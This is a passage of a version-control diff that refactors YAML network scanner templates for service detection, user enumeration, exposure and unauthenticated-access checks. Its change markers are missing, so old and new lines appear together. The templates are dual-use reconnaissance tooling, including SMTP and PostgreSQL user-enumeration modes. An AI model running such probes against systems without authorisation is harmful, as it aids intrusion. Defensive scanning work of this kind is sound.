tags: network,ftp,smartgateway,gnu,inetutils,detect
tcp:
@ -17,8 +17,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
matchers:
- type: word
words:

7
network/detection/gopher-detect.yaml
View File

@ -8,18 +8,17 @@ info:
Gopher service was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,gopher,detect
metadata:
max-request: 2
max-request: 1
tags: network,gopher,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:70"
port: 70
matchers:
- type: dsl

7
network/detection/ibm-d2b-database-server.yaml
View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/db2-das-info.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"IBM DB2 Database Server"
verified: true
tags: network,ibm,database,db,db2,detect
tcp:
@ -25,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:50000"
port: 50000
matchers-condition: and
matchers:

7
network/detection/imap-detect.yaml
View File

@ -8,12 +8,11 @@ info:
IMAP was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
shodan-query: imap
verified: true
shodan-query: 'imap'
tags: network,detect,imap,mail
tcp:
@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:143"
port: 143
matchers-condition: and
matchers:

5
network/detection/iplanet-imap-detect.yaml
View File

@ -8,11 +8,10 @@ info:
iPlanet Messaging Server IMAP protocol was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap"
max-request: 1
tags: network,imap,detect
tcp:
@ -20,7 +19,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:110"
port: 110
matchers:
- type: word

6
network/detection/microsoft-ftp-service.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 2
max-request: 1
shodan-query: Microsoft FTP Service
verified: true
shodan-query: "Microsoft FTP Service"
tags: network,ftp,microsoft,detect
tcp:
@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
matchers:
- type: word

6
network/detection/mikrotik-ftp-server-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"MikroTik router ftpd"
verified: true
shodan-query: 'product:"MikroTik router ftpd"'
tags: network,ftp,mikrotik,router,detect
tcp:
@ -17,7 +17,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
matchers:
- type: word

7
network/detection/mikrotik-routeros-api.yaml
View File

@ -8,12 +8,11 @@ info:
MikroTik RouterOS API was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"MikroTik RouterOS API Service"
verified: true
tags: network,mikrotik,detect
tcp:
@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:8728"
port: 8728
matchers:
- type: word

13
network/detection/mongodb-detect.yaml
View File

@ -6,15 +6,14 @@ info:
severity: info
description: |
MongoDB service was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference:
- https://github.com/orleven/Tentacle
tags: network,mongodb,detect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
tags: network,mongodb,detect
tcp:
- inputs:
@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:27017"
port: 27017
read-size: 2048
matchers:

9
network/detection/msmq-detect.yaml
View File

@ -11,10 +11,10 @@ info:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554
metadata:
max-request: 2
verified: true
shodan-query: MSMQ
censys-query: services.service_name:MSMQ
max-request: 1
shodan-query: MSMQ
verified: true
tags: network,msmq,detect
tcp:
@ -24,8 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:1801"
port: 1801
read-size: 2048
matchers:

7
network/detection/mysql-detect.yaml
View File

@ -8,12 +8,11 @@ info:
MySQL instance was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"MySQL"
verified: true
tags: network,mysql,db,detect
tcp:
@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:3306"
port: 3306
matchers:
- type: word

13
network/detection/openssh-detect.yaml
View File

@ -6,24 +6,23 @@ info:
severity: info
description: |
OpenSSH service was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference:
- http://www.openwall.com/lists/oss-security/2016/08/01/2
- http://www.openwall.com/lists/oss-security/2018/08/15/5
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://nvd.nist.gov/vuln/detail/CVE-2016-6210
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: seclists,network,ssh,openssh,detect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
tags: seclists,network,ssh,openssh,detect
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
port: 22
matchers:
- type: regex

7
network/detection/pgsql-detect.yaml
View File

@ -11,12 +11,11 @@ info:
- https://www.postgresql.org/docs/current/client-authentication-problems.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: port:5432 product:"PostgreSQL"
verified: true
tags: network,postgresql,db,detect
tcp:
@ -28,7 +27,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:5432"
port: 5432
read-size: 2048
matchers-condition: and

7
network/detection/pop3-detect.yaml
View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
shodan-query: pop3 port:110
verified: true
shodan-query: 'pop3 port:110'
tags: network,detect,pop3,mail
tcp:
@ -24,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:110"
port: 110
matchers:
- type: word

6
network/detection/proftpd-server-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"ProFTPD"
verified: true
shodan-query: 'product:"ProFTPD"'
tags: network,ftp,proftpd,detect
tcp:
@ -17,7 +17,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
matchers:
- type: word

6
network/detection/rabbitmq-detect.yaml
View File

@ -9,9 +9,9 @@ info:
reference:
- https://nmap.org/nsedoc/scripts/amqp-info.html
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"RabbitMQ"
verified: true
tags: network,rabbitmq,oss,detect
tcp:
@ -20,7 +20,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:5672"
port: 5672
matchers-condition: and
matchers:

5
network/detection/rdp-detect.yaml
View File

@ -8,10 +8,9 @@ info:
Windows Remote Desktop Protocol was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
verified: true
tags: network,windows,rdp,detect
@ -22,8 +21,8 @@ tcp:
read-size: 2048
host:
- "{{Host}}:3389"
- "{{Hostname}}"
port: 3389
matchers:
- type: word

8
network/detection/redis-detect.yaml
View File

@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 4
max-request: 1
shodan-query: product:"redis"
verified: true
tags: network,redis,detect
@ -19,10 +19,8 @@ tcp:
- data: "*1\r\n$4\r\ninfo\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:6379"
- "tls://{Hostname}}"
- "tls://{{Host}}:6380"
- "tls://{{Host}}"
port: 6380
read-size: 1024
matchers:

6
network/detection/riak-detect.yaml
View File

@ -6,9 +6,9 @@ info:
severity: info
description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability.
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"Riak"
verified: true
tags: network,oss,detect
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:8087"
port: 8087
read-size: 2048
matchers:

7
network/detection/rpcbind-portmapper-detect.yaml
View File

@ -8,12 +8,11 @@ info:
reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: port:"111"
verified: true
tags: network,rpcbind,portmap,detect
tcp:
@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:111"
port: 111
matchers:
- type: word

7
network/detection/rsyncd-service-detect.yaml
View File

@ -10,11 +10,10 @@ info:
- https://linux.die.net/man/1/rsync
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,rsyncd,detect
metadata:
max-request: 2
max-request: 1
tags: network,rsyncd,detect
tcp:
- inputs:
@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:873"
port: 873
matchers:
- type: word

7
network/detection/rtsp-detect.yaml
View File

@ -10,12 +10,11 @@ info:
https://nmap.org/nsedoc/scripts/rtsp-methods.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: RTSP/1.0
verified: true
tags: network,rtsp,detect
tcp:
@ -25,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:554"
port: 554
read-size: 1024
matchers:

9
network/detection/samba-detect.yaml
View File

@ -8,12 +8,12 @@ info:
reference:
- https://www.samba.org/samba/what_is_samba.html
- https://www.samba.org/samba/history/security.html
remediation: Always apply the latest security patch.
classification:
cwe-id: CWE-200
remediation: Always apply the latest security patch.
tags: network,smb,samba,detect
metadata:
max-request: 2
max-request: 1
tags: network,smb,samba,detect
tcp:
- inputs:
@ -21,8 +21,7 @@ tcp:
type: hex
host:
- "{{Hostname}}"
- "{{Host}}:139"
port: 139
matchers-condition: and
matchers:
- type: word

6
network/detection/sap-router.yaml
View File

@ -4,11 +4,11 @@ info:
name: SAPRouter Detection
author: randomstr1ng
severity: info
tags: network,sap,detect
description: |
SAProuter is a software application that provides a remote connection between our customer's network and SAP.
metadata:
max-request: 2
max-request: 1
tags: network,sap,detect
tcp:
- inputs:
@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:3299"
port: 3299
read-size: 1024
matchers:

6
network/detection/smb-detect.yaml
View File

@ -4,11 +4,11 @@ info:
name: SMB Detection
author: pussycat0x
severity: low
tags: network,windows,smb,service,detect
description: |
SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems.
metadata:
max-request: 2
max-request: 1
tags: network,windows,smb,service,detect
tcp:
- inputs:
@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:445"
port: 445
matchers:
- type: word

7
network/detection/smtp-detect.yaml
View File

@ -4,18 +4,19 @@ info:
name: SMTP Service Detection
author: pussycat0x
severity: info
tags: network,service,smtp,detect
description: |
SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks.
metadata:
max-request: 2
max-request: 1
tags: network,service,smtp,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers:
- type: word
words:

6
network/detection/sshd-dropbear-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems
metadata:
max-request: 2
max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,detect
tcp:
@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:22"
port: 22
matchers:
- type: word

6
network/detection/starttls-mail-detect.yaml
View File

@ -4,11 +4,11 @@ info:
name: STARTTLS Mail Server Detection
author: r3dg33k
severity: info
tags: mail,starttls,network,detect
description: |
STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one.
metadata:
max-request: 2
max-request: 1
tags: mail,starttls,network,detect
tcp:
- inputs:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers:
- type: word

24
network/detection/teamspeak3-detect.yaml
View File

@ -1,23 +1,23 @@
id: teamspeak3-detect
info:
name: TeamSpeak 3 ServerQuery Detection
author: pussycat0x
severity: info
description: |
ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
metadata:
max-request: 2
shodan-query: product:"TeamSpeak 3 ServerQuery"
verified: true
tags: network,service,teamspeak3,detect
info:
name: TeamSpeak 3 ServerQuery Detection
author: pussycat0x
severity: info
description: |
ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
metadata:
max-request: 1
shodan-query: product:"TeamSpeak 3 ServerQuery"
verified: true
tags: network,service,teamspeak3,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:2002"
port: 2002
matchers:
- type: word

6
network/detection/telnet-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: port:23 telnet
verified: true
tags: network,telnet,detect
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:23"
port: 23
matchers:
- type: word

6
network/detection/totemomail-smtp-detect.yaml
View File

@ -4,11 +4,11 @@ info:
name: Totemomail SMTP Server Detection
author: princechaddha
severity: info
tags: mail,smtp,network,totemomail,detect
description: |
Totemomail is a comprehensive email solution designed to address all aspects of digital communication security.
metadata:
max-request: 2
max-request: 1
tags: mail,smtp,network,totemomail,detect
tcp:
- inputs:
@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers:
- type: word

6
network/detection/vmware-authentication-daemon-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"VMware Authentication Daemon"
verified: true
shodan-query: 'product:"VMware Authentication Daemon"'
tags: network,vmware,authenticated,detect
tcp:
@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:902"
port: 902
matchers:
- type: word

6
network/detection/vnc-service-detect.yaml
View File

@ -7,16 +7,16 @@ info:
description: A Virtual Network Computing (VNC) service was detected.
classification:
cwe-id: CWE-200
tags: network,vnc,service,detect
metadata:
max-request: 2
max-request: 1
tags: network,vnc,service,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Host}}:5900"
- "{{Hostname}}"
port: 5900
matchers:
- type: word

6
network/detection/xlight-ftp-service-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"Xlight ftpd"
verified: true
shodan-query: 'product:"Xlight ftpd"'
tags: network,ftp,xlight,detect
tcp:
@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
matchers:
- type: word

3
network/enumeration/beanstalk-service.yaml
View File

@ -20,7 +20,8 @@ tcp:
read: 8
host:
- "{{Host}}:11300"
- "{{Hostname}}"
port: 11300
matchers:
- type: word

3
network/enumeration/kafka-topics-list.yaml
View File

@ -23,7 +23,8 @@ tcp:
read: 1024
host:
- "{{Host}}:9092"
- "{{Hostname}}"
port: 9092
matchers-condition: or
matchers:

7
network/enumeration/mongodb-info-enum.yaml
View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/mongodb-info.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: mongodb server information
verified: true
tags: network,mongodb,enum
tcp:
@ -25,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:27017"
port: 27017
read-size: 2048
matchers:

10
network/enumeration/niagara-fox-info-enum.yaml
View File

@ -6,12 +6,12 @@ info:
severity: info
description: |
Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium.
metadata:
max-request: 2
verified: true
shodan-query: 'product:"Niagara Fox"'
reference:
- https://nmap.org/nsedoc/scripts/fox-info.html
metadata:
max-request: 1
shodan-query: product:"Niagara Fox"
verified: true
tags: network,fox,niagara,enum
tcp:
@ -19,7 +19,7 @@ tcp:
- data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n"
host:
- "{{Hostname}}"
- "{{Host}}:1911"
port: 1911
matchers:
- type: word

4
network/enumeration/psql-user-enum.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007
metadata:
max-request: 2
max-request: 1
shodan-query: port:5432 product:"PostgreSQL"
verified: "true"
tags: network,postgresql,db,unauth,enum,psql
@ -21,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:5432"
port: 5432
attack: clusterbomb
payloads:

6
network/enumeration/smtp-commands-enum.yaml
View File

@ -9,9 +9,9 @@ info:
reference:
- https://nmap.org/nsedoc/scripts/smtp-commands.html
metadata:
max-request: 2
max-request: 1
shodan-query: smtp
verified: true
shodan-query: 'smtp'
tags: network,enum,smtp,mail
tcp:
@ -23,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers:
- type: word

4
network/enumeration/smtp/smtp-user-enum.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://nmap.org/nsedoc/scripts/smtp-enum-users.html
metadata:
max-request: 2
max-request: 1
shodan-query: smtp
verified: true
tags: network,enum,smtp,mail
@ -23,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
attack: batteringram
payloads:

6
network/exposures/cisco-smi-exposure.yaml
View File

@ -15,9 +15,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: network,cisco,smi,exposure
metadata:
max-request: 2
max-request: 1
tags: network,cisco,smi,exposure
tcp:
- inputs:
@ -26,7 +26,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:4786"
port: 4786
matchers:
- type: word

6
network/exposures/exposed-adb.yaml
View File

@ -9,9 +9,9 @@ info:
- https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20
- https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
- https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/
tags: network,adb,rce,android,exposure
metadata:
max-request: 2
max-request: 1
tags: network,adb,rce,android,exposure
tcp:
- inputs:
@ -23,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:5555"
port: 5555
matchers:
- type: word

6
network/exposures/exposed-dockerd.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: port:2375 product:"docker"
verified: true
tags: network,docker,exposure
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:2375"
port: 2375
matchers:
- type: word

6
network/exposures/exposed-redis.yaml
View File

@ -12,7 +12,7 @@ info:
cvss-score: 7.2
cwe-id: CWE-306
metadata:
max-request: 4
max-request: 1
tags: network,redis,unauth,exposure
tcp:
@ -20,10 +20,8 @@ tcp:
- data: "info\r\nquit\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:6379"
- "tls://{Hostname}}"
- "tls://{{Host}}:6380"
port: 6380
read-size: 2048
matchers-condition: and

6
network/exposures/exposed-zookeeper.yaml
View File

@ -7,9 +7,9 @@ info:
description: Apache ZooKeeper was able to be accessed without any required authentication.
reference:
- https://zookeeper.apache.org/security.html
tags: network,zookeeper,unauth,exposure
metadata:
max-request: 2
max-request: 1
tags: network,zookeeper,unauth,exposure
tcp:
- inputs:
@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:2181"
port: 2181
read-size: 2048
matchers:

4
network/misconfig/apache-dubbo-unauth.yaml
View File

@ -10,7 +10,7 @@ info:
- https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/
metadata:
fofa-query: apache dubbo
max-request: 2
max-request: 1
verified: true
tags: network,dubbo,apache,unauth,misconfig
@ -21,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:20880"
port: 20880
read-size: 2048
matchers:

4
network/misconfig/apache-rocketmq-broker-unauth.yaml
View File

@ -10,7 +10,7 @@ info:
- https://rocketmq.apache.org/docs/bestPractice/03access
metadata:
fofa-query: protocol="rocketmq"
max-request: 2
max-request: 1
shodan-query: title:"RocketMQ"
verified: true
tags: network,rocketmq,broker,apache,unauth,misconfig
@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:10911"
port: 10911
read-size: 2048
matchers-condition: and

10
network/misconfig/clamav-unauth.yaml
View File

@ -8,13 +8,13 @@ info:
ClamAV server 0.99.2, and possibly other previous versions, allow the execution
of dangerous service commands without authentication. Specifically, the command 'SCAN'
may be used to list system files and the command 'SHUTDOWN' shut downs the service.
metadata:
max-request: 2
verified: true
shodan-query: 'port:3310 product:"ClamAV" version:"0.99.2"'
reference:
- https://seclists.org/nmap-dev/2016/q2/201
- https://bugzilla.clamav.net/show_bug.cgi?id=11585
metadata:
max-request: 1
shodan-query: port:3310 product:"ClamAV" version:"0.99.2"
verified: true
tags: network,clamav,unauth,seclists,misconfig
tcp:
@ -22,7 +22,7 @@ tcp:
- data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:3310"
port: 3310
read-size: 48
matchers:

6
network/misconfig/clickhouse-unauth.yaml
View File

@ -5,9 +5,9 @@ info:
author: lu4nx
severity: high
description: ClickHouse was able to be accessed with no required authentication in place.
tags: network,clickhouse,unauth,misconfig
metadata:
max-request: 2
max-request: 1
tags: network,clickhouse,unauth,misconfig
tcp:
- inputs:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:9000"
port: 9000
read-size: 100
matchers:

10
network/misconfig/dropbear-weakalgo.yaml
View File

@ -6,14 +6,14 @@ info:
severity: low
description: |
The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable.
remediation: |
Disable the weak algorithms.
reference: |
https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled
remediation: |
Disable the weak algorithms.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,misconfig
tcp:
@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:22"
port: 22
matchers:
- type: word

10
network/misconfig/dropbear-weakmac.yaml
View File

@ -6,14 +6,14 @@ info:
severity: low
description: |
The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client.
remediation: |
Disable MD5 and 96-bit MAC algorithms.
reference: |
https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled
remediation: |
Disable MD5 and 96-bit MAC algorithms.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,misconfig
tcp:
@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:22"
port: 22
matchers-condition: and
matchers:

6
network/misconfig/ganglia-xml-grid-monitor.yaml
View File

@ -7,9 +7,9 @@ info:
description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids.
reference:
- http://ganglia.info/
tags: ganglia,network,misconfig
metadata:
max-request: 2
max-request: 1
tags: ganglia,network,misconfig
tcp:
- inputs:
@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:8649"
port: 8649
read-size: 2048
matchers:

6
network/misconfig/memcached-stats.yaml
View File

@ -4,11 +4,11 @@ info:
name: Memcached stats disclosure
author: pdteam
severity: low
tags: network,memcached,misconfig
description: |
Memcached stats is used to return server statistics such as PID, version, connections, etc.
metadata:
max-request: 2
max-request: 1
tags: network,memcached,misconfig
tcp:
- inputs:
@ -16,7 +16,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:11211"
port: 11211
read-size: 2048
matchers:

7
network/misconfig/mongodb-unauth.yaml
View File

@ -10,9 +10,9 @@ info:
- https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
- https://www.mongodb.com/features/mongodb-authentication
remediation: Enable Authentication in MongoDB
tags: network,mongodb,unauth,misconfig
metadata:
max-request: 2
max-request: 1
tags: network,mongodb,unauth,misconfig
tcp:
- inputs:
@ -21,7 +21,8 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:27017"
port: 27017
read-size: 2048
matchers:
- type: word

7
network/misconfig/mysql-native-password.yaml
View File

@ -9,16 +9,15 @@ info:
- https://github.com/Tinram/MySQL-Brute
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,mysql,bruteforce,db,misconfig
metadata:
max-request: 2
max-request: 1
tags: network,mysql,bruteforce,db,misconfig
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:3306"
port: 3306
matchers:
- type: word

4
network/misconfig/printers-info-leak.yaml
View File

@ -16,7 +16,9 @@ tcp:
- inputs:
- data: "@PJL INFO STATUS\n"
host:
- "{{Host}}:9100"
- "{{Hostname}}"
port: 9100
matchers:
- type: word
words:

6
network/misconfig/sap-router-info-leak.yaml
View File

@ -8,9 +8,9 @@ info:
reference:
- https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner
- https://support.sap.com/en/tools/connectivity-tools/saprouter.html
tags: network,sap,misconfig
metadata:
max-request: 2
max-request: 1
tags: network,sap,misconfig
tcp:
- inputs:
@ -19,7 +19,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:3299"
port: 3299
read-size: 2048
matchers:

6
network/misconfig/tidb-native-password.yaml
View File

@ -9,14 +9,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: network,tidb,bruteforce,db,misconfig
metadata:
max-request: 2
max-request: 1
tags: network,tidb,bruteforce,db,misconfig
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:4000"
port: 4000
